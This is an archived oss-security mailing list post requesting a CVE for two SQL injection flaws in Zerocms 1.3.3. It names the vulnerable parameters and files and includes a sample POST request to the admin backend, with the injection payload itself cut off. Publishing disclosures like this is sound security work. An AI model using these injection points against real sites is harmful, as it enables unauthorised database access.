Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 1 Feb 2015 09:15:03 +0100
From: Steffen Rösemann <>
Subject: CVE-Request -- Zerocms <= v. 1.3.3 -- SQL injection vulnerabilities

Hi Steve, Josh, vendors, list.

I found two SQL injection vulnerabilities in Zerocms <= v. 1.3.3.

The first SQL injection vulnerability is located in the article_id
parameter used in zero_view_article.php and can be exploited even by
unauthenticated attackers.

See the following exploit-example:


The second vulnerability is a Blind SQL injection an is located in the
user_id parameter used in a POST request in zero_transact_user.php.

An attacker can exploit this vulnerabilitiy in the administrative backend
via the following POST request exploit-example:

POST /views/zero_transact_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:35.0)
Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://{TARGET}/views/zero_user_account.php?user_id=2
Cookie: PHPSESSID=rirftt07h0dem8d48lujliuve6
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

name=user& {SQL injection goes

Could you please assign a CVE-ID for this?

Thank you very much.

Greetings from Germany.

Steffen Rösemann



Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.